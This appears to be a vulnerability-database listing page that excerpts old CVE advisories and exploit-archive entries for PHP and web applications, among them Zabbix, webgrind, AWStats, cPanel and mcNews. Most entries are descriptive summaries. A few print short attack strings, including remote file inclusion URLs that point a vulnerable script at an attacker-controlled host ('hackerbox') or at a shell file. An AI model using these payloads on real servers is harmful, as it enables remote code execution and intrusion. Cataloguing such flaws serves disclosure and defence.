CVE-2013-6824

Zabbix before 1.8.19rc1, 2.0 before 2.0.10rc1, and 2.2 before 2.2.1rc1 allows remote Zabbix servers and proxies to execute arbitrary commands via a newline in a flexible user parameter...

webgrind 1.0 - 'file' Local File Inclusion

webgrind 1.0 file param Local File Inclusion Vulnerability Vendor: Joakim Nygard and Jacob Oettinger Product web page: http://code.google.com/p/webgrind Affected version: 1.0 v1.02 in trunk on github Summary: Webgrind is an Xdebug profiling web frontend in PHP5. Desc: webgrind suffers from a file...

TBmnetCMS 1.0 Cross Site Scripting

| D R U N K E N | || || || D A N I S H | || || |' R E D N E C K S '--''--''--' RESEARCH AND FUCKING HACKING: | DRUNKEN DANISH REDNECKS | || || || !!!!!!! | || || |' [email protected] '--''--''--' = TBmnetCMS 1.0 XSS | | "content" PARMETER IN tbmnet.php @...

CVE-2008-2495

CVE-2008-2495 is a directory traversal vulnerability affecting Zina 1.0 RC3. The flaw is in index.php where a .. (dot dot) in the p parameter can be exploited by remote attackers to access files. The NVD entry lists a CVSS2 base score of 7.5 (HIGH) with network attack vector and low complexity, n...

CVE-2008-1384

CVE-2008-1384: In PHP 5.2.5 and earlier, an integer overflow in printf/ sprintf formatting (via the php_sprintf_appendstring path in formatted_print.c) can be triggered by a large width specifier, leading to a denial of service and potentially other impact. Affected software is PHP 5.2.5 and olde...

@cid stats v2.3 File Include

@cid stats v2.3 File Include Source Code: http://www.comscripts.com/jump.php?action=script&id=1115 Vulnerable Code: install.php3 In Line 41 : require"'.$repertoire."/".'statsfonctions.php3 Exploit : http://www.VicTim.com/@/install.php3?repertoire=ShElL.txt? Discoverd By : Mahmoodali Special...

PHP mcNews <= 1.3 (skinfile) Remote File Include Vulnerability

No description provided by source. Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/mcNews/admin/header.php?skinfile=http://hackerbox/ milw0rm.com 2005-03-07...

AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution

!/usr/bin/perl ---GHC--------------------------------- Remote command execution exploit Product: Advanced Web Statistics 6.0 - 6.2 URL:http://awstats.sourceforge.net Greets & respects to our friends: 1dt.w0lf and all rst.void.ru Special greets 2 d0G4 & cr0n for link on bugtraq...

Siteman 1.1 - User Database Privilege Escalation (2)

Siteman 1.1 - User Database Privilege Escalation 2 source: https://www.securityfocus.com/bid/12304/info Siteman is reported prone to a vulnerability that may allow users to gain elevated privileges. This issue results from insufficient sanitization of user-supplied data. Apparently, an attacker c...

Siteman 1.1 - User Database Privilege Escalation (1)

source: https://www.securityfocus.com/bid/12304/info Siteman is reported prone to a vulnerability that may allow users to gain elevated privileges. This issue results from insufficient sanitization of user-supplied data. Apparently, an attacker can supply additional lines to the stream used to...

CVE-2004-1551

Cross-site scripting XSS vulnerability in the 1 email or 2 file modules in paFileDB 3.1 Final allows remote attackers to execute arbitrary web script or HTML via the id parameter...

cPanel 5-9 - Passwd SQL Injection

source: https://www.securityfocus.com/bid/10505/info cPanel is reportedly affected by a remote SQL injection vulnerability in the passwd script. This issue is due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL query. The problem...

Mailtraq 2.2 - 'Browse.asp' Cross-Site Scripting

source: https://www.securityfocus.com/bid/7813/info Mailtraq is vulnerable to cross-site scripting attacks. The vulnerability exists due to insufficient sanitization of HTTP requests to the vulnerable Mailtraq server. An attacker can exploit this vulnerability by manipulating the 'cfolder' URI...

CVE-2002-1019

The library feature for Adobe Content Server 3.0 allows a remote attacker to check out an eBook for an arbitrary length of time via a modified loanMin parameter to download.asp...